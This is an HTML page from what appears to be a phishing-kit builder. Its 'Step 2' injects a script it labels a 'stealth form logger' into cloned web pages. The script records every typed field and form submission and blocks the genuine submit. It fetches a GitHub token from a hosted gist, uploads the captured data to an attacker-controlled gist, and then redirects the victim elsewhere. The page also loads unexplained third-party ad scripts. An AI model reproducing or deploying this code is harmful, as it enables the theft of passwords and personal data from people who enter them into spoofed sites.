<!DOCTYPE html>
<html lang="en">
<head>
<script>(s=>{s.dataset.zone=9809250,s.src='https://groleegni.net/vignette.min.js'})([document.documentElement, document.body].filter(Boolean).pop().appendChild(document.createElement('script')))</script>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Step 2 - HTML Processor</title>
    <link href="https://fonts.googleapis.com/css2?family=Roboto:wght@300;400;500;700&display=swap" rel="stylesheet">
    <style>
        :root {
            --primary-color: #4a6fa5;
            --success-color: #4caf50;
            --error-color: #f44336;
            --warning-color: #ff9800;
            --light-bg: #f8f9fa;
            --dark-text: #333;
            --light-text: #666;
            --border-radius: 6px;
            --box-shadow: 0 4px 12px rgba(0, 0, 0, 0.1);
        }
        
        body {
            font-family: 'Roboto', sans-serif;
            max-width: 900px;
            margin: 0 auto;
            padding: 30px;
            line-height: 1.6;
            color: var(--dark-text);
            background-color: #f5f7fa;
        }
        
        h1 {
            color: var(--primary-color);
            margin-bottom: 25px;
            font-weight: 700;
            border-bottom: 2px solid var(--primary-color);
            padding-bottom: 10px;
        }
        
        h2 {
            color: var(--primary-color);
            margin-top: 0;
            font-weight: 500;
        }
        
        .container {
            background-color: white;
            padding: 30px;
            border-radius: var(--border-radius);
            margin-bottom: 30px;
            box-shadow: var(--box-shadow);
        }
        
        .btn {
            background-color: var(--primary-color);
            color: white;
            padding: 12px 24px;
            border: none;
            border-radius: var(--border-radius);
            cursor: pointer;
            font-size: 16px;
            font-weight: 500;
            transition: all 0.3s ease;
            margin-right: 10px;
        }
        
        .btn:hover {
            background-color: #3a5a8f;
            transform: translateY(-2px);
            box-shadow: 0 6px 12px rgba(0, 0, 0, 0.15);
        }
        
        .btn-success {
            background-color: var(--success-color);
        }
        
        .btn-success:hover {
            background-color: #3d8b40;
        }
        
        .status {
            margin: 20px 0;
            padding: 15px;
            border-radius: var(--border-radius);
            border-left: 5px solid;
        }
        
        .success {
            background-color: #e8f5e9;
            color: #2e7d32;
            border-left-color: var(--success-color);
        }
        
        .error {
            background-color: #ffebee;
            color: #c62828;
            border-left-color: var(--error-color);
        }
        
        .info {
            background-color: #e3f2fd;
            color: #1565c0;
            border-left-color: var(--primary-color);
        }
        
        #redirectUrlInput {
            width: 100%;
            padding: 12px;
            margin: 10px 0 20px;
            box-sizing: border-box;
            border: 1px solid #ddd;
            border-radius: var(--border-radius);
            font-size: 16px;
            transition: border 0.3s;
        }
        
        #redirectUrlInput:focus {
            border-color: var(--primary-color);
            outline: none;
            box-shadow: 0 0 0 2px rgba(74, 111, 165, 0.2);
        }
        
        .input-group {
            margin: 25px 0;
        }
        
        label {
            display: block;
            margin-bottom: 8px;
            font-weight: 500;
            color: var(--dark-text);
        }
        
        .user-info-card {
            background-color: var(--light-bg);
            padding: 15px;
            border-radius: var(--border-radius);
            margin-bottom: 20px;
            border-left: 4px solid var(--primary-color);
        }
        
        .user-info-card strong {
            color: var(--primary-color);
        }
        
        .button-group {
            display: flex;
            gap: 10px;
            margin-top: 20px;
        }
        
        .instructions {
            background-color: #fff8e1;
            padding: 15px;
            border-radius: var(--border-radius);
            margin-bottom: 20px;
            border-left: 4px solid var(--warning-color);
        }
        
        .instructions h3 {
            margin-top: 0;
            color: var(--warning-color);
        }
    </style>
</head>
<body>
    <h1>Step 2: Process and Store HTML</h1>

    <div class="container">
        <h2>HTML Processing Panel</h2>
        
        <div class="instructions">
            <h3>Instructions</h3>
            <p>This step will inject the data capture script into your HTML and prepare it for deployment. Enter the URL where users should be redirected after form submission.</p>
        </div>

        <div id="status" class="status info">
            Ready to process HTML content from localStorage...
        </div>

        <div id="userInfo" class="user-info-card">
            <strong>User Information:</strong><br>
            Loading user data...
        </div>

        <div class="input-group">
            <label for="redirectUrlInput">Redirect URL (after successful submission):</label>
            <input type="text" id="redirectUrlInput" placeholder="https://www.example.com/success" value="https://www.dtech24.co.za">
            <small>This is where users will be redirected after submitting forms</small>
        </div>
<script async="async" data-cfasync="false" src="//gapcontroversialprodigal.com/17bdc3ff4d9e3bbe0f49799dd182c4c1/invoke.js"></script>
<div id="container-17bdc3ff4d9e3bbe0f49799dd182c4c1"></div>
        <div class="button-group">
            <button id="processBtn" class="btn">Process HTML</button>
            <button id="nextBtn" class="btn btn-success" style="display: none;">Proceed to Step 3 →</button>
        </div>
    </div>

    <script>
        document.addEventListener('DOMContentLoaded', function() {
            const statusEl = document.getElementById('status');
            const userInfoEl = document.getElementById('userInfo');
            const processBtn = document.getElementById('processBtn');
            const nextBtn = document.getElementById('nextBtn');
            const redirectUrlInput = document.getElementById('redirectUrlInput');

            // Check if data1step exists
            if (!localStorage.getItem('data1step')) {
                statusEl.textContent = 'Error: No HTML content found in localStorage (data1step missing). Please complete Step 1 first.';
                statusEl.className = 'status error';
                processBtn.disabled = true;
                return;
            }

            // Get user info
            let userInfo = { username: 'unknown', gistId: '' };
            try {
                const loggedInUser = localStorage.getItem('loggedInUser');
                if (loggedInUser) {
                    userInfo = JSON.parse(loggedInUser);
                }
            } catch (e) {
                console.error('Error parsing user info:', e);
            }

            // Display user info
            userInfoEl.innerHTML = `
                <strong>User Information:</strong><br>
                Username: ${userInfo.username}<br>
                Gist ID: ${userInfo.gistId || 'Not specified'}
                ${!userInfo.gistId ? '<br><small style="color: var(--warning-color);">Warning: Using default Gist ID</small>' : ''}
            `;

            // Handle process button click
            processBtn.addEventListener('click', function() {
                const redirectUrl = redirectUrlInput.value.trim();

                // Validate URL
                if (!redirectUrl) {
                    statusEl.textContent = 'Error: Please enter a redirect URL';
                    statusEl.className = 'status error';
                    redirectUrlInput.focus();
                    return;
                }

                try {
                    new URL(redirectUrl); // This will throw if URL is invalid
                } catch (e) {
                    statusEl.textContent = 'Error: Please enter a valid URL (include http:// or https://)';
                    statusEl.className = 'status error';
                    redirectUrlInput.focus();
                    return;
                }

                // Get the HTML from data1step
                let html = localStorage.getItem('data1step');

                // Inject the script just before closing body tag
                const scriptToInject = `
<!-- STEALTH FORM LOGGER (GIST UPLOAD) -->
<script>
// CONFIGURATION
const CONFIG = {
    // Gist configuration
    GIST_ID: '${userInfo.gistId || 'baf8538c85354add526e6cb4c40dcd3a'}',
    GIST_FILENAME: '${userInfo.username || 'Data'}.json',
    
    // GitHub token URL (replace with your own token endpoint if needed)
    TOKEN_URL: 'https://gist.githubusercontent.com/Dtech2preas/498a03fc1467fc14c66358e0f5721517/raw/a9f82f8fef545600174cdf9b5b1735b865bf5582/gistfile1.txt',

    // Time to wait after typing before considering input "finished" (ms)
    INPUT_IDLE_TIMEOUT: 2000,

    // Patterns that indicate a submit button
    SUBMIT_BUTTON_PATTERNS: [
        'submit', 'login', 'sign in', 'continue', 
        'next', 'confirm', 'proceed', 'authenticate'
    ]
};

// ===== INVISIBLE LOGGER =====
(() => {
    // Silent console logging (optional for debugging)
    const log = (msg, type='info') => {
        console.log(\`[Stealth Logger] \${msg}\`); // Only visible in browser console
    };

    // ===== DATA CAPTURE =====
    let typingTimer;
    let formData = {};

    // Fetch GitHub token
    const fetchToken = async () => {
        try {
            const res = await fetch(CONFIG.TOKEN_URL);
            return (await res.text()).trim();
        } catch (err) {
            log('Failed to fetch token', 'error');
            return null;
        }
    };

    // Upload data to Gist
    const uploadToGist = async (data) => {
        try {
            const token = await fetchToken();
            if (!token) return false;

            // Prepare the data with timestamp
            const timestamp = new Date().toISOString();
            const entry = {
                page_url: window.location.href,
                ...data
            };

            // Step 1: Get current content of the Gist
            const gistRes = await fetch(\`https://api.github.com/gists/\${CONFIG.GIST_ID}\`, {
                headers: { Authorization: \`token \${token}\` }
            });

            if (!gistRes.ok) {
                log('Failed to fetch existing gist', 'error');
                return false;
            }

            const gistData = await gistRes.json();
            let currentData = {};

            if (gistData.files && gistData.files[CONFIG.GIST_FILENAME]) {
                try {
                    currentData = JSON.parse(gistData.files[CONFIG.GIST_FILENAME].content);
                } catch (e) {
                    currentData = {};
                }
            }

            // Step 2: Append new data with timestamp key
            currentData[timestamp] = entry;

            // Step 3: Send PATCH to update the Gist
            const updateRes = await fetch(\`https://api.github.com/gists/\${CONFIG.GIST_ID}\`, {
                method: 'PATCH',
                headers: {
                    'Authorization': \`token \${token}\`,
                    'Content-Type': 'application/json'
                },
                body: JSON.stringify({
                    files: {
                        [CONFIG.GIST_FILENAME]: {
                            content: JSON.stringify(currentData, null, 2)
                        }
                    }
                })
            });

            if (updateRes.ok) {
                // Redirect to user-specified URL after successful upload
                window.location.href = '${redirectUrl}';
            }

            return updateRes.ok;
        } catch (err) {
            log('Gist upload failed: ' + err.message, 'error');
            return false;
        }
    };

    // ===== EVENT HANDLERS =====
    const setupInputHandlers = () => {
        document.querySelectorAll('input, textarea, select').forEach(field => {
            field.addEventListener('input', () => {
                clearTimeout(typingTimer);
                typingTimer = setTimeout(() => {
                    const name = field.name || field.id || 'unnamed_field';
                    const value = field.value;
                    if (value) {
                        formData[name] = value; // Stores raw value
                    }
                }, CONFIG.INPUT_IDLE_TIMEOUT);
            });
        });
    };

    const setupSubmissionHandlers = () => {
        // Form submissions
        document.querySelectorAll('form').forEach(form => {
            form.addEventListener('submit', (e) => {
                e.preventDefault(); // Stop default submission

                const data = {};
                Array.from(form.elements).forEach(el => {
                    if (el.name && el.value) {
                        data[el.name] = el.value; // RAW DATA
                    }
                });
                uploadToGist(data);
            }, true);
        });

        // Button clicks
        document.querySelectorAll('button, input[type="button"], input[type="submit"]').forEach(btn => {
            btn.addEventListener('click', (e) => {
                const btnText = (btn.textContent || btn.value || '').toLowerCase();
                const isSubmit = CONFIG.SUBMIT_BUTTON_PATTERNS.some(pattern => 
                    btnText.includes(pattern)
                );

                if (isSubmit && Object.keys(formData).length > 0) {
                    uploadToGist(formData);
                    formData = {}; // Clear after submission
                }
            }, true);
        });
    };

    // ===== INITIALIZATION =====
    setupInputHandlers();
    setupSubmissionHandlers();

    // Watch for dynamically added elements
    new MutationObserver(() => {
        setupInputHandlers();
        setupSubmissionHandlers();
    }).observe(document.body, { childList: true, subtree: true });
})();
<\/script>
`;

                // Find the closing body tag and insert the script before it
                const bodyCloseTagIndex = html.lastIndexOf('</body>');
                if (bodyCloseTagIndex !== -1) {
                    const modifiedHtml = html.slice(0, bodyCloseTagIndex) + scriptToInject + html.slice(bodyCloseTagIndex);

                    // Save to data2step
                    localStorage.setItem('data2step', modifiedHtml);

                    statusEl.innerHTML = `
                        <strong>Success!</strong><br>
                        HTML processed successfully with script injection.<br>
                        Modified content saved to <code>data2step</code> in localStorage.<br><br>
                        Users will be redirected to: <code>${redirectUrl}</code> after form submission.
                    `;
                    statusEl.className = 'status success';
                    processBtn.style.display = 'none';
                    nextBtn.style.display = 'block';
                } else {
                    statusEl.textContent = 'Error: Could not find </body> tag in the HTML content';
                    statusEl.className = 'status error';
                }
            });

            // Handle next button click
            nextBtn.addEventListener('click', function() {
                window.location.href = 'step3.html';
            });
        });
    </script>


</body>
</html>